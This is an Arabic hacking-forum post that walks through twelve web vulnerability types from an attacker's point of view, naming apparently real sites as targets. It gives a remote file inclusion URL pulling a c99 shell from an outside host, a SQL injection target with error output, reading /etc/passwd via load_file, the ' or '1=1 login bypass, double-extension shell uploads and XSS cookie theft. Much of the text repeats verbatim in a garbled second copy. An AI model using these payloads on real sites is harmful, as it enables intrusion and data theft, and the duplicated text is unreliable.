بسم الله الرحمن الرحيم
نبذه عن معظم انواع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
كود PHP:
http://www.insights.co.il/site.php?page=http://shaja.malware-site.www/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.malware-site.www/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
كود PHP:
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
كود PHP:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
نبذه عن معظم انواع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] بإذن الله العظيم
بسم الله بدأنآ
1 - ثغرات ريموت فايل انكلود Remot File include
طبعا من اشهر انواع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود
بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى
كالشيل مثلا s1
لكن قليلة في وقتنا هذ1
طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1
خلينا نشوف مثال
كود PHP:
http://www.insights.co.il/site.php?page=http://shaja.malware-site.www/c99.txt?
معنا الموقع هذا
الملف المصاب site.php
المتغير المصاب ?page
=http://shaja.malware-site.www/c99.txt
رابط الشيل اللي هندرجو داخل الموقع
عن طريق الملف + المتغير المصاب
طبعآ لاننسى علامة الاستفهام ؟
انتهيها من النوع الأول
---------------------------------------------
2- SQL injection سكيول انجكشن
طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php
و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp
توضيح :
وهي ثغرات الحقن في قواعد البيانات
خطورة الثغرة خطيرة جدآ
لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)
وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ
مثال على موقع مصاب بثغرة الحقن
كود PHP:
http://www.dtincr.ph/news.php?id=1
لاحظ لو اضفت بعد المتغير 1 علامة '
فلاحظ وجود الخطأ
كود PHP:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /home/dtincr/public_html/news.php on line 20
طبعا هذا خطأ سكيول
خلينا نشرح عنه شوية
اللي بهمنا news.php?id=1
news.php الملف المصاب
?id=1 المتغير المصاب
طبعا بيكون اكثر من رقم واحد
مثال ?id=42 ...الخ
مثال حي على استغلال ثغرة سكيول انجكشن
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]--+
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
كود PHP:
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا الملف المصاب index.php
المتغير المصاب ?lang
وقدرنا نستغلو ونقرأ الأمر
انتهى الشرح للنوع الثالث
----------------------------------------------------------
4- ثغرات Remot file upload
طبعا هذا النوع سهل جدا
تسمح لك بادراج ملف
عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل
طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال
طبعا الثغرة بتسمح لك برفع ملف
ويجب عليك انك تشغل مخك
يعني مثلا عندنا مركز تحميل مايقبل صيغة php
نروح نجرب نرفع بامتداد rar
يعني يكون الامتداد كذ1 c99.php.rar
أو c99.php.gif
طبعا بأكثر من امتداد
ومش شرط ان الثغرة تكون في مركز التحميل فقط
احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol
مثل ثغرة الـ phpizabi
انتيهنا من النوع الرابع ..
------------------------------------
5-ثغرات الـ Bypass
من اسهل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الموجودة
بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر
عن طريق ادراج رموز مثل or '1=1
طيب الرموز المستخدمة كثير ة
عن استغلال ثغرات الباي بآس
كود PHP:
http://www.4shared.com/file/101822143/a5d458e8/Bypass.html
انتهينا من الشرح
.................................................. .
6- Database Backup Dump Vulnerability
ثغرات خطيرة جدا
وتسمح لك بنسخ قواعد البيانات كاملة
طبعا لما تحمل قواعد البيانات
رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5
وطبعا مواقع الفك كثيرة
انتهينا من النوع السادس
------------------------------------------------
7- Remote Admin Password Change
طبعا النوع هذا مشهور جدا
وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم
طبعا المثال الحي ثغرة token joomla
الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن
انتهينا من النوع السابع
-------------------------------------------------
8- perl exploit
وهي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اللي بتكون مكتوبة بلغة البيرل
طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل
بقوللكم
ملفات البيرل بكون امتدادها مثل
كود PHP:
exploit.pl
او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود
كود PHP:
#!/usr/bin/perl
اعرف على السريع انو الثغرة مكتوبة بلغة البيرل
استغلالها
لازم تكون منزل على جهازك مترجم البيرل ActivePerl
حتى يترجم ثغرات البيرل
طبعا الاستغلال بكون
حفظ الثغرة بامتداد .pl
مثلا Sec-t.pl
طبعا البرنامج رح تنصب بالمسار هذا
كود PHP:
c:/perl
بعد ما نحفظ الثغر ة
نروح نضع ملف Sec-t.pl
كود PHP:
c:/perl/bin
بعد هيك نروح للدوس cmd
كود PHP:
cd
وندخل لقرص c
بعدها نتجه بالامر
كود PHP:
cd perl
يصبح مسارنا
كود PHP:
c:/perl
بعدها
كود PHP:
cd bin
رح يصبح مسارنا
كود PHP:
C:/pel/bin
بعدها شغل الثغرة بامر
كود PHP:
perl Sec-t.pl
بعدها رح يعطيك كيفية استخدام الثغرة
انتهى شرح النوع الثامن
------------------------------------------
9- ثغرات File Disclosure
تستطيع من خلالها قراءة اي ملف من الموقع
انتهى الشرح للنوع التاسع
-----------------------------------
10- ثغرات xxs Cross-Site Scripting
وهي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية
وتحليله عن طريق برنامج cookies editor
عبر كود معين والأكواد المختصة كثيرة ماشا الله
وشركة الهوتميل مشهورة بثغرات الـ xxs
انتهى الشرح للنوع العاشر
--------------------------------------------
11- ثغرات Command Execution
وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**
على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1
لانك تقدر تقرأ ملفات من السيرفر
-----------------------------
12- Buffer overflow ثغرات
الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح
لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر
هذا كان توضيح فقط عن ثغرات البفر اوفر فلو
-------------------------------------------------
طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd
'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي
شرح من الاخ Red-D3v1L
لاكتشاف واستغلال ثغرات الـ sql
كود PHP:
http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html
انتهينا من ثغرات الحقن
------------------------------------------
3 - ثغرات اللوكال فايل انكلود local file include
طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1
مثل ملف الشادو المهم lol
مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا الملف المصاب index.php
المتغير المصاب ?lang
وقدرنا نستغلو ونقرأ الأمر
انتهى الشرح للنوع الثالث
----------------------------------------------------------
4- ثغرات Remot file upload
طبعا هذا النوع سهل جدا
تسمح لك بادراج ملف
عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل
طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال
طبعا الثغرة بتسمح لك برفع ملف
ويجب عليك انك تشغل مخك
يعني مثلا عندنا مركز تحميل مايقبل صيغة php
نروح نجرب نرفع بامتداد rar
يعني يكون الامتداد كذ1 c99.php.rar
أو c99.php.gif
طبعا بأكثر من امتداد
ومش شرط ان الثغرة تكون في مركز التحميل فقط
احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol
مثل ثغرة الـ phpizabi
انتيهنا من النوع الرابع ..
------------------------------------
5-ثغرات الـ Bypass
من اسهل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] الموجودة
بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر
عن طريق ادراج رموز مثل or '1=1
طيب الرموز المستخدمة كثير ة
عن استغلال ثغرات الباي بآس
كود PHP:
http://www.4shared.com/file/101822143/a5d458e8/Bypass.html
انتهينا من الشرح
.................................................. .
6- Database Backup Dump Vulnerability
ثغرات خطيرة جدا
وتسمح لك بنسخ قواعد البيانات كاملة
طبعا لما تحمل قواعد البيانات
رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5
وطبعا مواقع الفك كثيرة
انتهينا من النوع السادس
------------------------------------------------
7- Remote Admin Password Change
طبعا النوع هذا مشهور جدا
وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم
طبعا المثال الحي ثغرة token joomla
الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن
انتهينا من النوع السابع
-------------------------------------------------
8- perl exploit
وهي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اللي بتكون مكتوبة بلغة البيرل
طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل
بقوللكم
ملفات البيرل بكون امتدادها مثل
كود PHP:
exploit.pl
او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود
كود PHP:
#!/usr/bin/perl
اعرف على السريع انو الثغرة مكتوبة بلغة البيرل
استغلالها
لازم تكون منزل على جهازك مترجم البيرل ActivePerl
حتى يترجم ثغرات البيرل
طبعا الاستغلال بكون
حفظ الثغرة بامتداد .pl
مثلا Sec-t.pl
طبعا البرنامج رح تنصب بالمسار هذا
كود PHP:
c:/perl
بعد ما نحفظ الثغر ة
نروح نضع ملف Sec-t.pl
كود PHP:
c:/perl/bin
بعد هيك نروح للدوس cmd
كود PHP:
cd
وندخل لقرص c
بعدها نتجه بالامر
كود PHP:
cd perl
يصبح مسارنا
كود PHP:
c:/perl
بعدها
كود PHP:
cd bin
رح يصبح مسارنا
كود PHP:
C:/pel/bin
بعدها شغل الثغرة بامر
كود PHP:
perl Sec-t.pl
بعدها رح يعطيك كيفية استخدام الثغرة
انتهى شرح النوع الثامن
------------------------------------------
9- ثغرات File Disclosure
تستطيع من خلالها قراءة اي ملف من الموقع
انتهى الشرح للنوع التاسع
-----------------------------------
10- ثغرات xxs Cross-Site Scripting
وهي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية
وتحليله عن طريق برنامج cookies editor
عبر كود معين والأكواد المختصة كثيرة ماشا الله
وشركة الهوتميل مشهورة بثغرات الـ xxs
انتهى الشرح للنوع العاشر
--------------------------------------------
11- ثغرات Command Execution
وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**
على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1
لانك تقدر تقرأ ملفات من السيرفر
-----------------------------
12- Buffer overflow ثغرات
الفيض overflow
الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح
لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
لذلك سميت buffer overflow
والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
فعند ادخال بيانات في المحدد يحدث هنا البفر
هذا كان توضيح فقط عن ثغرات البفر اوفر فلو
-------------------------------------------------
المصدر: [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]